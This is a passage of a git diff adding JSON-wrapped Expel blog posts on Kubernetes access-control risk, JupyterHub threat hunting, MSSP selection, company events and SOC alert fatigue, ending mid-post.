asterisk\u2014also known as the \u201cwildcard character\u2014which may mean an action is granting more permissions than intended. For example, granting the \u201c*\u201d verb on ClusterRoles might seem safe because there are built-in privilege escalation prevention checks, but that is not the case. As covered above, this would grant \u201cbind\u201d and \u201cescalate\u201d access as well, for privilege escalation. Because of unintended consequences like this, the wildcard characters should only be used with care. Securing Kubernetes is Increasingly Essential Access control in Kubernetes is massively important, especially as Kubernetes becomes increasingly common for production and business-critical workloads. Understanding how RBAC authorization works is crucial for granting necessary permissions, but it remains important to avoid handing out more permissions than necessary and maintain a least-privilege mindset. Today\u2019s attackers are becoming increasingly savvy when it comes to exploiting overlapping permissions, misconfigurations, and stolen identities. Effective role-based access control in Kubernetes can help keep those exposures to a minimum." +} \ No newline at end of file diff --git a/understanding-the-3-classes-of-kubernetes-risk.json b/understanding-the-3-classes-of-kubernetes-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..55e46d2ef43d5dad9745486f610cc06061637e8b --- /dev/null +++ b/understanding-the-3-classes-of-kubernetes-risk.json @@ -0,0 +1,6 @@ +{ + "title": "Understanding the 3 Classes of Kubernetes Risk", + "url": "https://expel.com/blog/understanding-the-3-classes-of-kubernetes-risk/", + "date": "Jan 30, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Understanding the 3 Classes of Kubernetes Risk Security operations \u00b7 1 MIN READ \u00b7 DAN WHALEN \u00b7 JAN 30, 2023 \u00b7 TAGS: Cloud security This article originally appeared on DarkReading.com and can be found here . It\u2019s reprinted here with permission. The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated. A few short years ago, not many people had heard of the word \u201cKubernetes.\u201d Today, the open source container tool is becoming increasingly ubiquitous, with a rapidly growing number of businesses using Kubernetes to facilitate a more streamlined and scalable application development process. But as its convenience and scalability lead to greater adoption, protecting Kubernetes environments has become a challenge. Security and IT leaders who want to keep their Kubernetes environments secure must be aware of the three primary classes of risk they face \u2014 and how to mitigate them. Class 1: Accidental Misconfigurations Thus far, accidental misconfigurations have been the most common form of Kubernetes risk \u2014 the one most security experts are likely to be familiar with. Misconfigurations can occur anytime a user does something that unintentionally introduces risk into the environment. That might mean adding a workload that grants unnecessary permissions or accidentally creating an opening for someone from the anonymous Internet to access the system. Kubernetes is still relatively new to many, which means it can be easy to make mistakes. Fortunately, there are several ways to mitigate misconfigurations. Just about everything that happens in Kubernetes automatically produces an audit log, and security teams can monitor those logs for anomalous signs. Many businesses do this by sending the logs to a security information and event management (SIEM) platform, which can identify predetermined signs of misconfiguration. Additionally, tools (both paid and open source) are available that can be used to scan your Kubernetes environment for best practice violations. Once the problem is identified, an alert can be sent to the appropriate party and the problem triaged. To continue reading the rest of this article, visit DarkReading.com ." +} \ No newline at end of file diff --git a/using-jupyterhub-for-threat-hunting-then-you-should.json b/using-jupyterhub-for-threat-hunting-then-you-should.json new file mode 100644 index 0000000000000000000000000000000000000000..d06d7b4fff7641fa9a5fcde5a216b0c780c4dc55 --- /dev/null +++ b/using-jupyterhub-for-threat-hunting-then-you-should.json @@ -0,0 +1,6 @@ +{ + "title": "Using JupyterHub for threat hunting? Then you should ...", + "url": "https://expel.com/blog/jupyterhub-threat-hunting-8-tricks/", + "date": "Nov 19, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Using JupyterHub for threat hunting? Then you should know these 8 tricks. Security operations \u00b7 8 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 NOV 19, 2019 \u00b7 TAGS: Get technical / How to / Hunting / SOC / Tools \u201cTest, learn, iterate\u201d is a mantra that\u2019s often repeated around the Expel office. I\u2019m not sure exactly how \u201cTest, learn, iterate\u201d became a thing, but if I had a dollar for every time Jon Hencinski said it, I\u2019d be living large on a private island somewhere. One of the services we offer here at Expel is threat hunting , and earlier this year our team set out to enhance our existing offering. \u201cLet\u2019s build a new tool within our existing ecosystem to better support hunting,\u201d we decided. Building a better threat hunting tool Of course \u201cbuilding a new tool\u201d is no small feat. Before we put hands to keyboards, we needed to define what a \u201cbetter\u201d threat hunting tool would look like. What new features and capabilities do our customers want? What kind of data will we need to interface with? How will the analysts interact with that data? What kind of workflows will allow us to be more productive? How do we define and measure that increase in productivity? The backbone of our existing threat hunting ecosystem is Expel Workbench \u2014 that\u2019s our one-stop-shop for our analysts to triage alerts, investigate incidents and communicate important info to our customers. While our hunting tools need to be baked into Expel Workbench, experimentation and rapid dev practices are out of the question in that environment. The experimentation dilemma Because experimenting directly in Expel Workbench can impact customers and the SOC, we started brainstorming other ways to iterate and test our new code that wouldn\u2019t impact the day-to-day functionality of the system. A few of us started using Jupyter Notebook as a training and development aid to assist analysts in learning new hunting techniques and providing decision support. If you aren\u2019t familiar, Jupyter Notebook offers \u201can open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text.\u201d We decided that if a Jupyter Notebook can provide structure to a workflow and decision support for analysts, why couldn\u2019t we inject the data into the workflow and pair the data output with the decision support? Using JupyterHub for threat hunting To also address our need for rapid development, process isolation and ease of access for our analysts, we soon decided that using JupyterHub was a good approach \u2014 it\u2019s a multi-user server designed for Jupyter Notebook. (If you want to learn more about JupyterHub, why we like it so much and the tips and tricks we learned along the way, check out this post: \u201c Our journey to JupyterHub and beyond. \u201d) Jupyter Notebook gave us the freedom to rethink the way we analyzed data that was collected for hunting. Instead of only providing analysts with one large output of data to review, such as a CSV of results, we can now enrich the data with additional context from other events and partner APIs, we can graph or plot the data for visualizations and we can combine other references or artifact lookups into the interface where the analyst has quick and easy access. Image: Example of references, artifact lookups and event enrichment from an Amazon Web Services (AWS) hunt. If you\u2019re curious about using JupyterHub for threat hunting decision support in your own org, here are a couple tips we\u2019ve learned and implemented that might be helpful to you and your team as you get up and running: Use a template-based deployment design If you\u2019re like us, you\u2019ve got many different hunting techniques and are always looking to add more to your library. A template acts as a chassis that has all of the necessities baked into it. We decided to engineer a fully customizable chassis that is configurable by a YAML config file. This gives non-engineering folks the ability to self-service the creation of new hunting techniques. In our ecosystem at Expel, we love to crowdsource our workloads across teams. The more people who can contribute to new hunt techniques, the faster we can turn out more high-quality hunts. Our hunting template includes the ability to: Authenticate and interact with our Workbench API Ingest and normalize data from multiple source types and devices Enrich customer hunting data with approved third-party intel APIs Tag and annotate important or noteworthy data Suppress irrelevant or false positive data Sort, filter and search of all data in the hunt Relevant references, graphs, charts and tables for further context Report stats such as time to complete a hunt, number of findings Generate audit trails, such as what data is being suppressed or reported Add raw data to a formatted findings report in Workbench Image: Example of sort, filter, search of all data in the hunt from an AWS hunt. Create a method for capturing and reporting user stats It\u2019s tough to get users to provide you with quality feedback. Everyone is busy and wants to be helpful but honest, quality feedback is hard to come by and in general response rates are often low. We do have a process for collecting feedback, feature requests and bugs; however, if you collect lots of user metrics, your results will start to tell a story and guide you toward what\u2019s working and what\u2019s not \u2014 without ever having to bug your users to share their feedback. If you build this into your template early, you can standardize on the stats you\u2019re going to have in all of your future technique deployments. This is absolutely key if you want to \u201ctest, learn and iterate.\u201d The majority of what we learn comes from trends we discover in our metrics \u2014 and then we\u2019re able to easily make adjustments to our processes based on what we learn from our users. Image: Example graph from our metrics notebook. Don\u2019t forget about enrichment Enrichment is key to a successful hunting program. Enrichment is taking an artifact and using it to derive additional information or context. For example, from an IP address artifacts, we can enrich it to find out the geolocation or its origin, the owning organization, whether the owning organization is an ISP or a hosting provider. With this additional information, we can now draw new conclusions from our IP address artifact. Raw logs for two different logon events will appear nearly identical at first review to an analyst. However, if you add enrichment data \u2014 like the owning organization of the source IP address, the geo-location of the source IP address or whether the IP address is associated with TOR or a datacenter \u2014 all of a sudden the data becomes dimensional and anomalies start to stand out. There\u2019s tremendous value in tags, annotation and suppression From month to month, environments change because of administrative updates, software updates and patches. Sometimes we\u2019ll conduct a well-established hunt technique, yet we get unexpected results due to recent changes in the environment. We found it\u2019s invaluable to give analysts the ability to tune the hunt on the fly. Additionally, sharing information between analysts from hunt to hunt and month to month has proved to be valuable, too. For example, if an analyst confirms that it\u2019s normal for Employee A at Organization Y to frequently log in from both the New York City and London offices, then the analyst can tag this type of activity. Then other analysts conducting future hunts don\u2019t need to repeat the same investigative legwork later, only to arrive at the same \u201cbusiness as usual\u201d conclusion. Allow for internal auditing Our tags and suppressions help us deliver efficient hunting results. That\u2019s why we built a special notebook just for auditing all our tags and suppressions. Senior analysts regularly review our tags and suppressions for accuracy and quality. Since we already have a regular cadence for quality assurance, we decided to also pull a sample set of findings reports into this notebook in order to review and improve our final delivery formats for our customers. This helps us all learn and improve, and allows us to iterate on our processes and deliverables to better serve our customers. Image: Preview of our quality assurance and audit notebook. Embrace downselects Downselects are what we call the smaller subsets of data that focus on a key aspect of the technique or generate a frequency count. Downselects can be reference links, graphs, charts, timelines, tables or a mini stats report. We found that it\u2019s great to have a few on each hunt; however, we also discovered that too many can be distracting and cause an analyst to feel disconnected from the overarching technique. We\u2019re still iterating on this one, and will report back soon (maybe even with a follow-up blog post). Image: Example of a mini stats report from an AWS hunt. Image: Example of a graph from an AWS hunt. Consistency can help drive efficiency At Expel, we strive to give all our customers a tailored experience. But there needs to be a careful balance between customization and consistency in order to drive efficiency. We\u2019ve chosen to have our analysts write unscripted, detailed messages to our customers regarding items identified in a findings report. Many other MSSPs and MDRs automate these. However, to maintain efficiency and a higher standard of delivery, we decided to import the analyst\u2019s message into the code and format the overall findings report. Also, instead of having a custom set of downselects written for each hunt, we wrote a library of a few good downselects, like a widget that displays frequencies of recurring events, a bar chart that displays the number of events over time, and a widget for looking up domains and IPs using our partner APIs. We can reuse these downselects between different hunts to reduce the overall amount of code and maintain consistency for our analysts between hunts. Fewer panes of glass drive efficiency Nobody likes looking through multiple panes of glass to conduct a hunt technique. We learned this early on. We used to have analysts hunt in one browser tab, with a suggested workflow and technique guide in another browser tab. We quickly discovered it\u2019s too hard to keep flipping back and forth. In our current template, we keep the same layout to maintain consistency for analysts between different hunting techniques, which reduces the amount of \u201cjumping around\u201d between different tasks within the workflow. Our layout includes the following items in this order: Authentication handler for various APIs Overview of the hunt technique What pre-filtering has already been applied during data collection Key things to look for and what evil might look like Suggested containment or remediation steps if evil is identified Analyst notes, tags and suppressions We just show what is relevant to the active hunt and hide inactive tags and suppressions Hunt data All of the unsuppressed results are displayed here with the ability to sort, filter and search Downselects Each downselect includes four keys in the YAML config file: Title: High level summary of what the downselect does Description: How is the data being manipulated or filtered and why Observables: This is a list of very specific things the analyst should watch out for that would represent indicators of known evil References: This is a list of internal and third-party resources where the analyst can learn more about the specific security aspect or indicator focused on by the downselect; it includes things like links to specific MITRE Att&k articles or reputable blog posts The downselect data; sometimes the data is a table which can be sorted, filtered and searched but other times it\u2019s a bar chart, diagram or map The downselect data appears directly in line and above the reference data to reduce pivots for the analyst What we\u2019re seeing so far Now that we have better stats for hunting, we have a clearer understanding of the volume of data our analysts are reviewing, what hunts require more or less time to analyze and complete and the amount of findings being reported by our various hunts. It\u2019s still early for us when it comes to collecting metrics, but we\u2019re starting to make more informed decisions about what hunts are working, why they\u2019re useful and where they tend to work best. This will help us continually improve our overall hunting program. What\u2019s next We\u2019re still in a \u201ctest, learn, iterate\u201d phase when it comes to JupyterHub, improving our hunting tools and techniques over time. As we identify the things that work best for our analysts, we\u2019re recording those items for our blueprints and wish lists and making continuous improvements to our hunting program." +} \ No newline at end of file diff --git a/viva-las-vegas-expel-heads-to-black-hat.json b/viva-las-vegas-expel-heads-to-black-hat.json new file mode 100644 index 0000000000000000000000000000000000000000..82914445f397ff1eef19ed39a470f444b7087854 --- /dev/null +++ b/viva-las-vegas-expel-heads-to-black-hat.json @@ -0,0 +1,6 @@ +{ + "title": "Viva Las Vegas! Expel heads to Black Hat", + "url": "https://expel.com/blog/expel-heads-to-black-hat/", + "date": "Jul 19, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Viva Las Vegas! Expel heads to Black Hat Expel insider \u00b7 2 MIN READ \u00b7 KELLY FIEDLER \u00b7 JUL 19, 2022 \u00b7 TAGS: Company news Q: What\u2019s the best part about summer? A: Summer Camp. Except this time, leave your bug spray and sleeping bag at home. Hacker Summer Camp (AKA: Black Hat) is back, and we\u2019re ready to pop up our tent (re: booth) on the show floor for the first time as exhibitors! Hot off of RSA Conference (RSAC), our carry-on bag to Vegas is full of recent, impactful product advancements to help our customers stay ahead of the cyber threats of today (and tomorrow). Think: ransomware, business email compromise (BEC), supply chain attacks, cryptojacking, and so on. So how do we help? First, Expel plugs the gaps in your detection coverage. Our friendly detection bot, Josie\u2122, uses your unique business context to enrich and correlate alerts to detect things earlier\u2014amplifying signals to spot behaviors you could otherwise miss across on-prem, cloud infrastructure, and SaaS apps. Then, our other (equally friendly) bot, Ruxie\u2122, does the tedious triage work so that humans can focus on the response decisions that humans make best. We quickly get to remediation (recommendations or automated\u2014you tell us!) to stop threats from spreading. The best part? We do all of that in 21 minutes or less. Yup\u2014that fast. When it\u2019s all said and done, we look at each investigation as a learning opportunity. We ask ourselves key questions, like: what were the root causes? And how do your peers compare? The whole time, our enhanced dashboards show you how your existing security investments and Expel are performing, so you can keep us accountable\u2014a strategy which only increases in importance as more applications and workloads move into the cloud. At the end of the day, we know security isn\u2019t just a checkbox\u2014it should empower your business. We\u2019re here to help your security team understand and address issues, minimize risk, and grow. If you can\u2019t tell, we love geeking out about this stuff\u2014and we\u2019d love to geek out with you in Vegas. To kick things off at Black Hat, we\u2019re hosting a \u201c Cuts & Cocktails \u201d reception at The Barbershop in the Cosmopolitan on Tuesday, August 9, 6 \u2013 9pm PT. Register here for a fresh cut, shave, (dry) hair styling, and makeup touch-ups to help you get ready for a night on the town and to hit the show floor. After you freshen up, head to the authentic speakeasy hidden in the back of the barbershop\u2014don\u2019t tell anyone we told you\u2014for craft cocktails, heavy hors d\u2019oeuvres, and the return of YouTube ( and RSAC ) sensation, Harry Mack ! (Shoutout to our sponsors, Tevora and Exabeam , for helping to make it all happen.) If you want to see for yourself how Expel is helping companies of all shapes and sizes make sense of security, book a meeting and stop by our booth (2861) on August 10 and 11." +} \ No newline at end of file diff --git a/warning-signs-that-your-mssp-isn-t-the-right-fit.json b/warning-signs-that-your-mssp-isn-t-the-right-fit.json new file mode 100644 index 0000000000000000000000000000000000000000..e61f4e82b6eab2ef582900c3faed4f6319466310 --- /dev/null +++ b/warning-signs-that-your-mssp-isn-t-the-right-fit.json @@ -0,0 +1,6 @@ +{ + "title": "Warning signs that your MSSP isn't the right fit", + "url": "https://expel.com/blog/warning-signs-mssp-isnt-right-fit/", + "date": "Nov 2, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Warning signs that your MSSP isn\u2019t the right fit Security operations \u00b7 7 MIN READ \u00b7 ANDREW HOYT \u00b7 NOV 2, 2017 \u00b7 TAGS: Managed security / Management / Selecting tech There are two sides to every relationship. When they go bad it\u2019s easy to blame yourself. But I\u2019m here to tell you, dear reader, that you don\u2019t need to (and shouldn\u2019t) accept mediocrity. There are many managed security service providers (MSSPs) out there \u2014 some of which do a few things really well, and some that well\u2026 don\u2019t. If you\u2019re trapped in a failing (or failed) relationship with your MSSP you\u2019re not alone. Here are some warning signs to look out for that indicate it\u2019s probably time to start considering some other options. Warning #1: The MSSP can\u2019t use the new product(s) you just bought You fought hard for budget and you\u2019ve spun up the new [insert cool technology product] in your environment. You even splurged on hiring and training staff to set it up, maintain it and look at the logs/alerts it generates. Why? Because that data is important to you. Except, you were hoping your new MSSP would be able to take that work off your hands so you can redeploy those resources. That\u2019s why you were so surprised when your MSSP told you that not only do they not support your new product, they\u2019ve got their own flavor of the product you just bought and they\u2019re going to have to put it in your environment for the service to work. So much for deploying those resources elsewhere. You\u2019re also going to need to find a way to correlate that data with the stuff coming from your MSSP, so you\u2019ll probably just dump everything into a SIEM and treat the MSSP as another alert feed. That\u2019s not how it was supposed to be (and it really doesn\u2019t have to). The right partner should use your existing technology. They shouldn\u2019t just integrate with the \u201cmeat and potatoes\u201d technologies in your infrastructure (think firewalls, IDS/IPS). They should also use the shiny new technologies you\u2019ve invested in to find modern threats (think endpoint detection and response (EDR)). If you see this warning sign here are a few questions to keep in your back pocket: What do you need to do to deploy the MSSP\u2019s service? Correct answer: Minimal software, no hardware, simple configuration changes. What, if any, additional products do you have to buy or replace to get value out of the service? Correct answer: None. What products do they support? Correct answer: Hopefully everything you already have. Realistic answer: The majority of what you have, especially the technologies you\u2019re already monitoring yourself and other important components are on the roadmap. This should include network and endpoint technologies! Warning #2: The onboarding process never ends You made it through the procurement process and got a signature on the contract. You thought you\u2019d be off to the races. But your MSSP dumped a bomb on you in the first call\u2026and your stomach dropped a bit. There were hundreds of pages of documentation, dozens of phone calls and meetings and project plans that stretched out into forever. It\u2019s months later and you\u2019re still onboarding while the promised value still lies somewhere over the (infinite) horizon. Your standards can and should be higher. The right partner should provide an onboarding experience that\u2019s point-and-click easy \u2014 closer to your smartphone than a call to your Cable TV provider\u2019s customer support line. Once data is flowing to your provider, you should be receiving value. In short, onboarding should take days (or even hours), and value should come in less than a week. If you feel like you\u2019re entering the onboarding danger zone ask these questions: How long will it take to onboard all in-scope technologies for the service? Correct answer: A week, max. Is there documentation for the onboarding process? Can I see it? Correct answer: Yes\u2026 and yes. And\u2026a bonus question. Can I onboard a device (or three) as a proof-of-concept before I sign up for the service? Correct answer: We\u2019d love that Likely answer: Ummmm\u2026 [awkward silence] Warning #3: You\u2019re getting lots of alerts\u2026but few answers You\u2019re onboarded! You\u2019re getting ready to sit back and let your MSSP work for you. And then it happens. Your morning email digest shows up\u2026 and it\u2019s full of alerts. 50 of them to be specific. What happened? Which ones are most important? Has there been a breach or are they just suspicious? Are any of the alerts related to each other? Or are they independent events that should be treated as separate incidents? How were they detected? Is this the beginning, middle, or end of an attack? Why does your MSSP hate you so much that they hand you these tiresome riddles every\u2026 single\u2026 day? Each alert should be a means to an end. Rather than accepting a pile of questions, find a partner that will give you answers. What happened? When? How? What\u2019s the risk? What should you do next? These are the answers you\u2019re paying for, not \u201chey, here\u2019s some alerts.\u201d More important, what is the data telling you over time? Your MSSP should be able to help identify trends and make strategic recommendations that reduce overall risk in your environment. In retrospect, these are the questions you would have asked during the sales process: Can I see a demo of your portal including the technical data and investigative reports I\u2019ll receive? Correct answer: Glad you asked. Here are the answers we\u2019ll give you. How will I know when there\u2019s an incident that matters? How do your analysts investigate them? Correct answer: Click. Look here. You can see exactly what our analysts are doing and why they\u2019re doing it Likely answer: Blah, blah, blah, alert stream, blah, certifications, blah, intelligence, blah, SLA. How do you measure the value you provide? Correct answer: Look at this dashboard. You can see how things are trending and the impact of our recommendations. Likely answer: Alerts detected each month. Warning #4: You\u2019re finding evil days (or weeks) before your MSSP does You found something bad (for the fourth time) days before your MSSP ever told you anything. There could be lots of reasons: they can\u2019t see it, they can\u2019t detect it, their processes are weak\u2026 or maybe their analysts just don\u2019t know much about you and your environment. Reducing the time from detection to response is a key metric for measuring risk mitigation in your environment. Context around what the threat is, how it got there, and what it\u2019s doing (or will do) are all critical when responding to attacks. Your MSSP should have the ability to pull alerts from your technologies, apply threat intelligence, and correlate activity across the network, endpoints and your SIEM before they send the activity to an analyst. This ensures they\u2019ll be able to tell the whole story. A good provider will tell you things about your environment \u2014 including your own tools and investments \u2014 that you didn\u2019t already know. In some cases they\u2019ll tell you things that aren\u2019t even related to a security incident. But you\u2019ll still care about them. They might reveal asset misuse or a misconfiguration issue. Either way, fresh eyes should consistently find fresh issues that matter to you. Your MSSP analysts should have close to (if not the same) visibility into your network that you do. That means shared tools and endpoint visibility. Your MSSP will also have a versatile detection engine to make sure they can catch increasingly sophisticated attacks. If you\u2019re being notified late (or never), or getting very little context, it\u2019s time to find alternatives. The answers to these questions will tell you if your team will be better at detecting threats than your MSSP: Can you implement these basic detection use cases that are important to me? Correct answer: Of course, and here\u2019s how we\u2019d do it. Can I see examples of incident notifications? Correct answer: Yes, they include all the context you need to respond to the incident. What data do your MSSP analysts see when they triage an alert? Correct answer: They have host visibility (think EDR) and can connect directly to your security technologies to investigate activity. Warning #5: You\u2019re hiring more people to manage your MSSP You\u2019re starting to dig into the service and you\u2019re getting that nervous feeling. The service looks great, but it\u2019s complicated. And you already know you\u2019re not going to be able to use this thing without help. Never fear! That\u2019s when your MSSP introduces you to their professional services team! They\u2019d be more than happy to sell you expensive people who can help make the thing you bought actually work (services for a service!). Or how about this? You still have a tier-1 analyst team that uses the alerts from the MSSP the same way they\u2019d use alerts from any other product. They get ingested into your SIEM and your team looks at them along with all of the other alerts the MSSP isn\u2019t capable of generating since they can\u2019t support some of the technologies you have. Either way, you\u2019re stuck doing it yourself\u2026 and creating even more work for you and your team. Yes, this actually happens. We know people (you know who you are) in this exact situation. Of course, the goal of any managed solution is to augment your existing capability so you and your team (if you have one) can spend less time fighting fires and more time working on strategic initiatives. When you have to add more firefighters to the team, it\u2019s probably because your MSSP is adding to the fire and not helping put it out. A good provider will reduce the time and money you spend on security operations tasks, not increase it. Here\u2019s how to tell if you\u2019re at risk for being on the wrong end of this equation: Include the people on your team who will be working with the service in the tech demo and let them ask questions. Do they feel comfortable using the service to do their jobs? Are they comfortable with the outputs of the service? Sit down with the vendor and map out the workflow between you and your team. How will your team use the service on a daily basis? Is the MSSP adding more steps to your process, or removing them? Does your workflow overlap, or is the MSSP just throwing more alerts over the fence and expecting you to fend for yourself? Go back to your detection uses cases. Did you bring a few that are important to you? If the MSSP can\u2019t implement them then you\u2019re stuck hiring people and purchasing technology that can. \u2014 Remember, your MSSP should help you get more value out of the technologies you\u2019ve already invested in and augment your security team. Above all else, your MSSP should give you answers (not just alerts) so you can improve your security posture in a measurable way. This can only happen if the service is easy to setup, easy to use, and versatile enough to align with your team\u2019s workflow and goals, not the other way around. As you evaluate your options, don\u2019t be afraid to include your team in the conversation. After all, they\u2019re the ones that\u2019ll have to work with the MSSP on a daily basis. Are they excited with what they see? If so, you know it\u2019s because it\u2019ll make their lives easier, not harder. There\u2019s no better litmus test than that." +} \ No newline at end of file diff --git a/watch-out-emea-here-we-come.json b/watch-out-emea-here-we-come.json new file mode 100644 index 0000000000000000000000000000000000000000..e173716a0cb119a06ec3828abcb8f24a444785d0 --- /dev/null +++ b/watch-out-emea-here-we-come.json @@ -0,0 +1,6 @@ +{ + "title": "Watch out EMEA\u2026here we come", + "url": "https://expel.com/blog/watch-out-emea-here-we-come/", + "date": "Oct 18, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Watch out EMEA\u2026here we come Expel insider \u00b7 1 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 OCT 18, 2022 \u00b7 TAGS: Company news For the past six-plus years, Expel has been a company firmly rooted in North America. It\u2019s where a lot of our customers are, it\u2019s where our people are, and it\u2019s where we are making big strides in changing the cybersecurity landscape for the better\u2014all to provide our customers with security that makes sense. Today we\u2019re excited to announce that we\u2019re expanding \u201cacross the pond\u201d and setting up shop in EMEA (the United Kingdom, Ireland, the Netherlands, and Sweden to be exact). Why are we making this move? Common cyber threats, like business email compromise (BEC), business application compromise (BAC), phishing, ransomware, cryptojacking, and more, impact companies globally. Our approach, centered around our combination of people, processes, and technology, can deliver the same positive cybersecurity outcomes to companies in these places that we\u2019ve experienced at home. We at Expel have proven that we can be effective in helping our customers mitigate these threats, and do so quickly, often hand-in-hand with our customers\u2019 security teams. Plus, the collaborative experience in the Expel Workbench\u2122 platform gives customers freedom in how they manage their security operations \u2014 whether that\u2019s following along with live investigations, or receiving alerts at every step from when an investigation starts until it\u2019s done. This transparency means customers always know what\u2019s happening, and is a core value at Expel. We\u2019re fortunate to have a few EMEA-based customers already, so we\u2019ve laid the groundwork for our approach in the region. We\u2019re also employing a channel-first sales model that leverages resellers\u2019 regional and industry-specific expertise. To meet the needs of our growing customer base, we\u2019re building out our team. In fact, I\u2019m Expel\u2019s first Europe-based employee! You can read more about me and Expel in general here , if you\u2019re interested! (BTW, we\u2019re hiring ). We\u2019re really thrilled to be expanding Expel into EMEA as the first step in our international journey. Keep an eye on our blog as we continue to share more information about our expansion into EMEA (and beyond)!" +} \ No newline at end of file diff --git a/we-re-definitely-stronger-together-top-3-takeaways-from.json b/we-re-definitely-stronger-together-top-3-takeaways-from.json new file mode 100644 index 0000000000000000000000000000000000000000..77e245617db85819b5dfc00beb70ea668b3b5ec3 --- /dev/null +++ b/we-re-definitely-stronger-together-top-3-takeaways-from.json @@ -0,0 +1,6 @@ +{ + "title": "We're definitely stronger together: top 3 takeaways from ...", + "url": "https://expel.com/blog/were-definitely-stronger-together-top-3-takeaways-rsa-conference-2023/", + "date": "May 5, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG We\u2019re definitely stronger together: top 3 takeaways from RSA Conference 2023 Expel insider \u00b7 3 MIN READ \u00b7 KELLY FIEDLER \u00b7 MAY 5, 2023 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools We\u2019re still whirling from our second year on the show floor at RSA Conference (RSAC) 2023! It was a week well-spent, full of interesting sessions, meaningful connections, and a whole lot of fun. The conference buzzed with pre-pandemic levels of excitement as we maneuvered through Moscone\u2014chatting with friends and swapping tales from the security operations center (SOC) on the latest cybersecurity threats and trends. Our team at the booth stayed busy from opening to closing announcements each day, giving demos, talking shop, and showing an approach to security that can actually be delightful. Also, local artist Bee Betwee joined us to create an art installation highlighting the many faces, backgrounds, and experiences that represent cybersecurity, a tangible ode to this year\u2019s theme of \u201cStronger Together.\u201d Now that the dust has settled and we\u2019ve had some time to reflect, here are our top takeaways from the show. There are lessons for defenders in the most unexpected places. The most surprising thing from this year\u2019s conference? How star-studded an affair it really was! From Saturday Night Live legend Fred Armisen, to Monty Python\u2019s Eric Idle, country music sensation Chris Stapleton, and famed physicist Michio Kaku (to name a few), it was hard not to be a little star-struck at this year\u2019s conference. But even if their sessions weren\u2019t exclusively about security, the undercurrent of community and collaboration was ever-present. RSAC is about the fellowship among defenders, as we\u2019re all tasked with the same challenge. Our adversaries are just as creative, smart, and well-resourced as we are, so our best advantage is to band together in fighting the good fight. (Who knew how much we needed a rendition of The Beatles\u2019, \u201cAll You Need Is Love,\u201d led by Fred Armisen, to remind us?) Generative AI is here to stay, and it\u2019s up to us to use it wisely. The promise of generative artificial intelligence (AI) represents as great an opportunity as it does a responsibility. It has the potential to change lives\u2014from relieving burnout by handling tedious tasks, to the effect it can have on the cybersecurity skills gap in both training and breaking down barriers for equity and inclusivity. The onus is on us, the defender community, to make a conscious effort to encourage mindful use of these tools to ensure they\u2019re fed with a diversity of thought and experiences. Our concern shouldn\u2019t be about what AI can do on its own, but what people can accomplish when we harness this technology correctly. Security-specific AI requires the combination of AI, hyperscale data, and threat intelligence, balanced with people as the important decision makers. This is a balance we\u2019ve believed in\u2014and done, with our friendly detection and response bots, Josie\u2122 and Ruxie\u2122\u2014since our inception, as our founders started Expel with a technology-forward approach. At the end of the day, we\u2019re solving people problems. From the talent gap, to the challenges and excitement presented by AI, to \u200c cybercriminals themselves, the common challenge is clear: we face a people problem. Whether talking about the White House security or the World Cup, the core takeaway was that the only way forward in the cybersecurity battle is to face it together. Another one of these \u201cpeople problems\u201d we talk about a lot is burnout\u2014it\u2019s an industry buzzword for a reason. Analysts drown in reams of alerts daily, and it\u2019s no secret that, without the right tech in place, the triage is tedious. So how can we do high-quality work without making our people miserable? From the jump, we\u2019ve believed the key to solving this people problem boils down to resourcing\u2014finding the right combination of skilled analysts and advanced automation that lets each do what they do best. Throughout the week, one thing was evident: it\u2019s going to take a village. The \u201cStronger Together\u201d theme really resonated with us at Expel because we\u2019ve always believed in collaboration and information sharing amongst the defender community to make us better as a whole. It\u2019s the reason we continue to share trends and recommendations from our SOC with our quarterly and annual threat reports, and why we keep it real here on our blog. We\u2019re also continuing to expand our solutions portfolio to keep pace with cybercriminals. At RSAC, we announced Expel Vulnerability Prioritization , a new solution that highlights which vulnerabilities pose the greatest risk, so organizations can take immediate, informed action. We\u2019re just getting started this year, and we can\u2019t wait to keep up the momentum. If you want to keep the conversation going, drop us a line anytime. And if you\u2019re interested in seeing our security operations platform, Expel Workbench\u2122, in action, you can sign up for a free 14-day trial of Expel MDR for Cloud Infrastructure here ." +} \ No newline at end of file diff --git a/what-i-love-lucy-teaches-us-about-soc-performance.json b/what-i-love-lucy-teaches-us-about-soc-performance.json new file mode 100644 index 0000000000000000000000000000000000000000..412ca3db80f47b87a545457e4c47df1fb560b935 --- /dev/null +++ b/what-i-love-lucy-teaches-us-about-soc-performance.json @@ -0,0 +1,6 @@ +{ + "title": "What \"I Love Lucy\" teaches us about SOC performance", + "url": "https://expel.com/blog/what-i-love-lucy-teaches-us-about-soc-performance/", + "date": "Mar 14, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG What \u201cI Love Lucy\u201d teaches us about SOC performance Security operations \u00b7 8 MIN READ \u00b7 MATT PETERS \u00b7 MAR 14, 2018 \u00b7 TAGS: Get technical / How to / SOC In September 1952, \u201cI Love Lucy\u2019s\u201d Lucy and Ethel decided to go to work in a candy factory. They were placed on an assembly line and told to individually wrap chocolates as they passed by . \u201cIf any of these end up in the packing room unwrapped, you\u2019ll both be fired,\u201d the supervisor said. The situation was fraught, and hijinks ensued. By the time cameras stopped rolling, Lucy and Ethel had fallen behind. Unwrapped candy was flowing into the packing room and both women had resorted to eating chocolates to try to stanch the flow. Back in the 1950s, this account of an overloaded system was \u201ccomedy gold.\u201d But you\u2019re probably wondering what any of this has to do with information security. Well, we see this type of thing pretty regularly in the security world. It\u2019s usually called \u201calert fatigue\u201d and it\u2019s not nearly as funny. Whether it\u2019s chocolate or alerts, fundamentally we\u2019re talking about the same problem: we\u2019re underwater, we\u2019ve started resorting to a ton of things we know aren\u2019t the right solution just to keep up and yet we\u2019re still underwater. When confronted with this situation, CISOs (or chocolate-factory owners) need to make some decisions about how to get out of trouble. It\u2019d be a mistake, however, to just start making 